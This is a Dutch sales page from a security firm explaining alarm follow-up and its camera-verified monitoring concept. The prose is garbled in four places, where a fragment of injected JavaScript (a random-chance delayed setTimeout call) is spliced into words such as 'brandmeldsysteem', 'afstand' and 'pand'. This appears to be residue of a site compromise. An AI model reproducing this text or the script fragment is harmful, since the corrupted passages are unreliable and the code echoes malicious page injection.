Het nut van adequate alarmopvolging

Alarmopvolging

Alarmopvolging: De traditionele manier

Onder alarmopvolging verstaan we het opvolgen van alarmmeldingen. Meldingen die elektronisch worden gedaan vanuit een inbraak- of brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andmeldsysteem. Het systeem geeft een melding naar een particuliere alarmcentrale. De centralist ontvangt de melding en stelt volgens een vooraf bepaald protocol een waarschuwadres in kennis. Veelal wordt de eigenaar van het bedrijf of object zelf gebeld om op locatie te gaan controleren wat de oorzaak van de melding is. Soms maakt men afspraken met een beveiligingsbedrijf en laat men deze controle op locatie uitvoeren door een gediplomeerde beveiliger.

U kunt zich voorstellen dat er, indien er daadwerkelijk een inbraak gepleegd is, er op deze wijze veel kostbare tijd verloren gaat: De melding wordt vanuit het systeem verstuurd naar de alarmcentrale. De alarmcentrale stelt de contactpersoon of beveiligingsdienst in kennis. De contactpersoon of beveiliger rijdt naar de locatie toe en voert de controle uit. Degene die de controle uitvoert constateert dat er is ingebroken en neemt contact op met de politie.

Los van de tijd die verloren gaat loopt degene die de controle uitvoert de kans de inbrekers tegen het lijf te lopen. Deze willen uiteraard niet worden gepakt en zullen zich waarschijnlijk hevig verzetten, wat grote veiligheidsrisico’s met zich meebrengt. Een kat in het nauw maakt immers rare sprongen…

Wordt de politie dan niet direct gebeld? Het antwoord: Nee!

De politie komt pas in actie als de melding is geverifieerd en als gebleken is dat het een daadwerkelijke criminele daad betreft. Er zal dus door de contactpersoon of beveiliger een controle moeten plaatsvinden, waaruit blijkt dat er daadwerkelijk sprake is van een inbraak. Pas als dit gebleken is komt de politie ter plaatse.

Alarmopvolging 2.0: Het Correct-concept

In uw tuin of bedrijfsterrein wordt één of, indien nodig, meerdere camera’s geplaatst. Deze camera’s zijn voorzien van een detectiemodule, waardoor zij bij het detecteren van beweging een e-mail met foto’s van de situatie sturen naar de meldkamer van Correct Beveiliging én uzelf.

De meldkamermedewerker kan vanuit de meldkamer controleren wat er op uw terrein gebeurt. Hij schakelt vanaf een veilige afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and direct over naar live-beelden en kan precies zien wat er gebeurt. Doordat de detectie al in uw tuin of bedrijfsterrein plaatsvindt (en er dus een verificatie van de melding is) kan vroegtijdig worden vastgesteld dat er onbevoegden op uw terrein aanwezig zijn.

Doordat de politie en beveiligingsdienst al worden aangestuurd voordat de inbreker in uw pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is, wordt de pakkans vele malen groter. In een heleboel gevallen wordt hierdoor zelfs een inbraak (en dus ook de schade) voorkomen. Al die tijd kijkt Correct Beveiliging en uzelf, als u dat wilt, mee.

De voordelen

De voordelen van het Correct-concept:

  • Vroegtijdige signalering waardoor voorkomen of beperken van braak- en gevolgschade;
  • Hele snelle verificatie van meldingen en dus een snelle aansturing van de politie;
  • Geen onnodige alarmopvolging door de surveillant;
  • Veiligheid: de eerste actie vindt op afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and plaats;
  • Monitoring vanuit een lokale meldkamer door deskundige medewerkers die bekend zijn met de omgeving.